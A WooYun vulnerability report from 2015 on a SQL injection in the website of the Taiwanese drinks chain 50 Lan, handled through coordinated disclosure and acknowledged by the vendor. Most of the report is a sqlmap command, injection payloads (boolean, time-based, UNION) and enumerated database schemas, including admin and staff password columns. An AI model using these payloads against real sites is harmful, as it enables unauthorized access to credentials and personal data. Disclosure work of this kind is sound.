当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155643

漏洞标题:台湾五十岚主站SQL注射泄露敏感用户信息(臺灣地區)

相关厂商:五十嵐

漏洞作者: 卖女孩的小火柴

提交时间:2015-11-25 14:39

修复时间:2016-01-11 23:04

公开时间:2016-01-11 23:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

rt

详细说明:

注入点:http://**.**.**.**/news_list.php?ny=2015&nm=11
code:sqlmap.py -u "http://**.**.**.**/news_list.php?ny=2015&nm=11" -p "ny"

漏洞证明:

Parameter: ny (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ny=2015' AND 5696=5696 AND 'OGEv'='OGEv&nm=11
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ny=2015' AND (SELECT * FROM (SELECT(SLEEP(5)))tLRO) AND 'Zzvn'='Zzv
n&nm=11
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: ny=2015' UNION ALL SELECT CONCAT(0x716a767871,0x5574497257625066627
8,0x7170767671),NULL,NULL,NULL,NULL,NULL-- &nm=11
---
[21:23:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache
Parameter: ny (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ny=2015' AND 5696=5696 AND 'OGEv'='OGEv&nm=11
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ny=2015' AND (SELECT * FROM (SELECT(SLEEP(5)))tLRO) AND 'Zzvn'='Zzv
n&nm=11
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: ny=2015' UNION ALL SELECT CONCAT(0x716a767871,0x5574497257625066627
8,0x7170767671),NULL,NULL,NULL,NULL,NULL-- &nm=11
---
[21:24:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[21:24:56] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] new50lan
Database: new50lan
[8 tables]
+-----------------+
| 50lan_admin |
| 50lan_member |
| 50lan_news_date |
| 50lan_news |
| 50lan_recruit |
| 50lan_vote |
| manager |
| staff |
+-----------------+
Database: new50lan
Table: 50lan_vote
[8 columns]
+----------------+-------------
| Column | Type
+----------------+-------------
| id | int(11)
| member_content | text
| member_date | timestamp
| member_file | varchar(250)
| member_mail | varchar(250)
| member_name | varchar(100)
| member_num | varchar(10)
| member_type | varchar(2)
+----------------+-------------
Database: new50lan
Table: 50lan_member
[7 columns]
+----------------+-------------
| Column | Type
+----------------+-------------
| member_address | varchar(200)
| member_birth | varchar(10)
| member_date | timestamp
| member_id | int(11)
| member_mail | varchar(200)
| member_name | varchar(20)
| member_tel | varchar(20)
+----------------+-------------
Database: new50lan
Table: 50lan_recruit
[7 columns]
+-------------------+----------
| Column | Type
+-------------------+----------
| recruit_area | varchar(2
| recruit_Education | varchar(2
| recruit_id | int(11)
| recruit_job | varchar(2
| recruit_type | varchar(2
| recruit_update | timestamp
| recruit_Years | varchar(2
+-------------------+----------
Database: new50lan
Table: manager
[3 columns]
+---------+------------+
| Column | Type |
+---------+------------+
| content | varchar(2) |
| id | int(11) |
| style | varchar(2) |
+---------+------------+
Database: new50lan
Table: 50lan_admin
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| Admin_date | timestamp |
| Admin_id | int(11) |
| Admin_name | varchar(50) |
| Admin_pwd | varchar(100) |
| Admin_type | varchar(2) |
| Admin_user | varchar(50) |
+------------+--------------+
Database: new50lan
Table: 50lan_news
[6 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| content | text |
| datatime | timestamp |
| id | int(11) |
| news_month | varchar(2) |
| news_year | varchar(4) |
| title | varchar(250) |
+------------+--------------+
Database: new50lan
Table: 50lan_news_date
[3 columns]
+------------+------------+
| Column | Type |
+------------+------------+
| id | int(11) |
| news_month | varchar(5) |
| news_year | varchar(5) |
+------------+------------+
Database: new50lan
Table: staff
[5 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| account | varchar(20) |
| administrator | int(1) |
| id | int(10) |
| name | text |
| passwd | varchar(20) |
+---------------+-------------+

EX6}9)NHUX6WS]CCIDEHL0J.png


修复方案:

。。。。。。

版权声明:转载请注明来源 卖女孩的小火柴@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-27 23:03

厂商回复:

感謝通報

最新状态:

暂无


漏洞评价:

评价